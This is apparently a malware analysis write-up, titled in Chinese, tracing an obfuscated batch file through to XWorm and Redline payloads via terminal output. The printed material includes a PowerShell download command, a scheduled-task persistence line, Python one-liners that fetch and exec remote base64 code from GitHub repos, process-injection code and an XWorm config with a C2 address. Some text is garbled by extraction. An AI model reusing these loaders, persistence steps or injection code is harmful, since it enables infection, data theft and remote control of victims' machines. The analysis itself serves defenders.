从高度混淆的批处理文件到 XWorm 和 Redline

remnux@remnux:/MalwareZoo/20240820$ xxd crypted.bat | head -300000000：fffe 2543 576b 4941 7a6f 7825 3e25 7855 ..%CWkIAzox%>%xU00000010: 7147 4f63 5425 257a 6341 796d 6d70 6325 qGOCT%%zcAymmpc%00000020：6e25 6763 5a53 704a 5065 2525 5243 7361 n％gcZSpJPe％％RCsa

%CWkIAzox%>%xUqGOcT%%zcAymmpc%n%gcZSpJPe%%RCsaTkgh%u%NrajlITIN%%FlosuXBh%l%UHWpNytD%%eVMEqNU%2%cfsrQUQzB%%PJakTgn%>%RefSuAz%%SkEtfgeM%&%eSIxMAoMy%% UTYiweX%1%wIwqYvcY% %ZPVOxQb%&%tySQLji%%YpbVsTD%&%LowuPzVsi% %dlyCzql%e%WdsbYAngD%%JAVuRTqx%x%qRAdGofXf%%ZlNPHhZ%i%BIHqMIv%%qAEKZwGsL%t%HCJPkwM%%HrmxKzzju%>%tgEGchZJ%%RPgxTsDqd%n%fOS LMWO %%AfRBXJVMr%u%wwuwslz%%ICSPyFU%l%mpdRSphJ% %ZynhxMK%2%DZjctPXH%%htGVgFpRM%>%SnuoRzrG%%bZgjFPGkJ%&%ZhtxeHp%%AkxdtiEx%1%fusLDeh% %QCHPHPX%|%kohylBV%%yJLIMIwFw%|%DeRJrLcp% %EvtJHRMln%c% xaarmMe %%akERTuAI%l%QojqolGI%%TunxPoBA%s%rjpMfvI%%oapTJQevr%@%WHKNkqk%%oqzVsZQ%e%YmNqtkd%%vdiHhTxI%c%xMvUDbmC%%WCXXQkQk%h%nueJqFl%%fMndPeG%o%WaNiIDzh%%uJeRwam%o%JdBMKkkK%%cRDqoXWq%f%YfipIdy %% EOiCmnjqu%f%jtWAxPYHA%%KzhGwGvJY%s%QMjCtXlpm%%KLXvhlX%^%zbASMkOKb%%MSoRIhosJ%e%oiRdjsAM%%IYWQOGT%t%JuxdyvMM%%nHqJvNFE%/%wJWtubVi%%jRBLVAoKa%^%zotsNYeS%%PKAAtOj%a%lHbOqSQ米% % gTRLvMIMh%a%TmYGqwITr%%tFWNDgGm%^%HAuoqhl%%AahyDuxE%n%brEAKhct%%sPaerVhD%S%PCCfCoV%%xyJnQmpg%=%xyZBFKb%%kgvpqle%0%igJPWFJh%%kHhywwZhj%3%OgmwBJPPO%%xWNiFhcNY%*%ospxJKsVH%%HWwoAYL%0% hqdGiiwS%%NosePdt%x%sTHZaRBMB%%SlmnYHf%3%EOZLOFflT%%VXgbmxUG%*%MPiWIOc%%kHUfmXe%0%MgkaPLhRY%%wZoyEHqhH%5%rQetBwquH%%eMdBPIjJ%*%oGzpdzdJc%%MPOdsiZQ%0%ruVOBkYqU%%KjFXrbbXb%3%GrywQPHa%%ApGTvfdw%5%hMcgXYFI%%nDAyneTR%*%QkVbhgwb%%ZlaxGFxhP%0%hVSWhhsi%%NFxCEiojT%x%avtVZdgT%%zOJsMdsiV%9%mIYjXPjXp%%XBPOHkzQR%7%TVTavXb%%zhDxhLixO%g%WqOitSUcP%%waQfbbZX%o%bYhMmYRJ%%JaLqJhJGK%^%wQcImER%%NjFttczP%t%zNQwEPG%%jckticUQ%^%SJHNHIEd%%QpgXMaZU%O%LYuYeAj% %TIMyhIah%;%kGMHyct% %FQiUhRT%,%wflaxcBC%%xGVWyGydK%,%OzsppQsYA%%jlFOQAm%;%fiDRSuVM% %anS%  ：519609  %DgVWcoR%s%ZoIFCLprt%%NntCxCm%e%NgFZpwn%%pyLYsOmAO%^%wdAjOvn%%FFANelC%t%vVpMctJn% %ALLnvmHl%/%mFxhErB%%zqQlKRs%a%myJtTSMTo% %PXuVWTw%a%fFQUkrEpq%%cYZxExF%^%xyNKacYxS%%OWQkNHdZN%N%GbQyEVZnc%%JxWlmKWiu%^%gpPMNUTz%%cnJkBEKME%S%nyQCCeW%%stOmRCyRR%=%lljWlaa%%MUJYsuW%2%dIgZDUB%%zKFhHQaX%*%qbSVGOmT%%wpkFVpUhQ%2%VeqoxYWD%%SlQwVpsX%*%mBJzSHuCR%%bxXgukkg%2%zSxetVaPj%%kGQLxTcxY%*%hDmfydQ%%OoXhDbZj%2%ZuhkxkEp%%xITWbJnYV%*%FXnJHNc%%ixLinKshS%0%DnoYFgL%%fSqOFgB%5%Xapkdbgb%%LxvKpZFaN%*%ePDNvAP%%AFDBLDAG%0%oYYBmwfe%%Qdiujzov%2%lWWUzOnsT%%SlVybcJx%3%xZiUqrR%%mlzpecCpj%*%xCQyduGrX%%oAbeUiyIE%(%QeZtONu%%ZcgvICAx%0%nhOmDybFj%%jjUoKBsu%6%fkjNdnHSc%%UGcGIqN%2%owehgYFDL%%FUwxiPOW%0%ikcPJSh%%pKQMamsY%^%PCQNlJF%%MbI ydjP %^%NmCLQGrsA%%uLrORben%0%wOOPMHXa%%ebFjSHOd%x%DdLTfYUW%%eFUkTQXc%8%PlNXoGxZ%%iZoIjTGWG%b%hPytbQcp%%wOoGCuJ%)%qMzNOpWLK%%EYUngJPBb%g%xtyhGUl%%RUGmrEQws%^%RRahjnG%%coXzOZPxy%O%znjAGFDUI%%TNHDTjQ%t%buwgVewv%%EhyQGHFA%^%MRCzzkdFZ%%PXScpQWPR%O%mDzExmBGg%%aEXetltkX%;%XRCvjYb% % NEAOkHpfx%,%Scqfgqhl%%nexdrDtk%;%GqOiFqUN%%rQyHZCT%；%lXGsxpKk%%PtFrFcYDl%,%GNEWsWFT% %AnS%  ：512015

remnux@remnux:/MalwareZoo/20240820$ sed -E "s/%w{5,}%//g" crypted-ascii.bat | head -10>nul 2>&1 && exit >nul 2>&1 || cls @echo off s^et /^a a^nS=03*0x3*05*035*0x97 go^t^O ; ,,; %anS%  :519609  se^t /a a^N^S=2*2*2*2*05*023*(0620^^0x8b) g^Ot^O ; ,;;, %AnS%

C:UsersREMDesktop>s^et /^aa^nS=03*0x3*05*035*0x97 197055

set /a anS=03*0x3*05*035*0x97gotO ; ,,; 197055set /a ans=0x3*(0545^036)*(0750^041)goto 519609set /a aNS=2*2*2*2*05*023*(0620^0x8b)gOtO ; ,;;, 430160for /L %n in (87 87 87) do (set "i=a"  )(set "i=a"  )set /a ans=05*07*~-14630goto 512015set /a aNs=0x11*045*(0343^0x1be)goTo ; ; ; 219521for /L %x in (792 792 792) do (set "j=b"  )(set "j=b"  )set /a ans=2*05*0x5*(0x5621^0x1ce2)goto 956950set /a ans=2*0xb*027*((0x170^0x18c8)>>3)gOto , ; 416438for /L %l in (579 579 579) do (set "k=c"  )(set "k=c"  )set /a ans=0x200*05*~-282goto 719360set /a anS=2*2*05*(0xdf47^0x7c3c)goto ; , 837020for /L %l in (783 783 783) do (set "l=d"  )(set "l=d"  )

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/LoneNone1807/RedAV/raw/main/Python310.zip', [System.IO.Path]::GetTempPath() + 'Python310.zip') "

$s = $payload = "import base64;exec(base64.b64decode('aW1wb3J0IHVybGxpYi5yZ ... (已移除) ... uZGVjb2RlKCd1dGYtOCcpKSk='))"; $obj = New-Object -ComObject WScript.Shell; $link = $obj.CreateShortcut("$env:LOCALAPPDATAWindowsSecurity.lnk"); $link.WindowStyle = 7; $link.TargetPath = "$env:LOCALAPPDATAProgramsPythonPython310pythonw.exe"; $link.IconLocation = "C:Program Files (x86)MicrosoftEdgeApplicationmsedge.exe,13"; $link.Arguments = "-c `"$payload`""; $link.Save() "

schtasks /create /tn "Windows Security" /sc ONLOGON /tr "C:UsersadminAppDataLocalWindowsSecurity.lnk" /rl HIGHEST /f

import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('hxxps://raw[.]githubusercontent[.]com/LoneNone1807/martin/main/xclient-enc').read().decode('utf-8')))remnux@remnux:/mnt/hgfs/MalwareZoo/20240820$ cat fooimport urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('hxxps://raw[.]githubusercontent[.]com/LoneNone1807/martin/main/redline-enc').read().decode('utf-8'))

remnux@remnux:/MalwareZoo/20240820$ base64dump.py -s 1 -d xclient-enc | head -20__7757181224032 = 0__7757181224032 += 1try:    raise MemoryError(__7757181224032)except MemoryError as __6869620366740:    if __6869620366740.args[0] == 1:        globals()['R_E_D__A_V_______'] = bool if bool(bool(bool(bool))) < bool(type(int(141) > int(136) < int(917) > int(914))) and bool(str(str(12) > int(1914) < int(135) > int(1213))) > 2 else bool    if __6869620366740.args[0] == 3:        __2756301777751 = 183678491109303    if __6869620366740.args[0] == 4:        __3230546755142 = 108555631585962    if __6869620366740.args[0] == 5:        __7482691456924 = 132970063103483__2177051061499 = 0__2177051061499 += 1try:    raise MemoryError(__2177051061499)except MemoryError as __2341209797439:    if __2341209797439.args[0] == 1:        globals()['R_E_D__A_V______'] = str if bool(bool(bool(str))) < bool(type(int(1119) > int(712) < int(39) > int(34))) and bool(str(str(174) > int(1712) < int(173) > int(513))) > 2 else str

remnux@remnux:/mnt/hgfs/MalwareZoo/20240820$ grep 'kernel32.' foo        kernel32.VirtualAllocEx.argtypes = [HANDLE, LPVOID, SIZE_T, DWORD, DWORD]       kernel32.VirtualAllocEx.restype = LPVOID       kernel32.WriteProcessMemory.argtypes = [HANDLE, LPVOID, LPCVOID, SIZE_T, POINTER(SIZE_T)]       kernel32.WriteProcessMemory.restype = BOOL       kernel32.CreateRemoteThread.argtypes = [HANDLE, LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD]       kernel32.CreateRemoteThread.restype = HANDLE       kernel32.VirtualProtectEx.argtypes = [HANDLE, LPVOID, SIZE_T, DWORD, LPDWORD]       kernel32.VirtualProtectEx.restype = BOOL       kernel32.CreateProcessA.argtypes = [LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, POINTER(STARTUPINFO), POINTER(PROCESS_INFORMATION)]       kernel32.CreateProcessA.restype = BOOL       kernel32.QueueUserAPC.argtypes = [PAPCFUNC, HANDLE, POINTER(ULONG)]       kernel32.QueueUserAPC.restype = BOOL       kernel32.ResumeThread.argtypes = [HANDLE]       kernel32.ResumeThread.restype = BOOL

is_created = kernel32.CreateProcessA(None, b'C:\Windows\System32\' + random.choice([b'svchost.exe', b'notepad.exe', b'lsass.exe', b'winlogon.exe', b'sihost.exe', b'taskhostw.exe', b'fontdrvhost.exe', b'wbem\WmiPrvSE.exe', b'RuntimeBroker.exe', b'conhost.exe', b'audiodg.exe', b'cmd.exe', b'smartscreen.exe', b'SecurityHealthSystray.exe', b'calc.exe', b'ping.exe', b'mspaint.exe', b'mstsc.exe', b'dwm.exe', b'spoolsv.exe', b'wuauclt.exe', b'SearchIndexer.exe', b'MusNotifyIcon.exe', b'WindowsPowerShell\v1.0\powershell.exe']), None, None, (lambda: (lambda _113: _113 - (lambda: ______R_E_D__A_V_______((lambda: R_E_D__A_V(b'R_E_D__A_V__wx'))()))())((lambda: R_E_D__A_V(b'R_E_D__A_V__'))()) == (lambda: R_E_D__A_V(b'R_E_D__A_V__x01'))())(), CREATE_SUSPENDED | CREATE_NO_WINDOW, None, None, byref(startup_info), byref(process_info))

is_written = kernel32.WriteProcessMemory(process_info.hProcess, remote_memory_address, buf, len(buf), byref(bytes_written))

buf = base64.b64decode(urllib.request.urlopen("hxxps://raw[.]githubusercontent[.]com/LoneNone1807/martin/main/XClient.b64")

{  "C2": "15[.]235[.]176[.]64:7000",  "Keys":    "AES": "<123456789>"  },  "Options":    "Splitter": "<Xwormmm>",    "Sleep time": "3",    "USB drop name": "XWorm V5.6",    "Mutex": "5stMCVxSzALOfTCK"  }}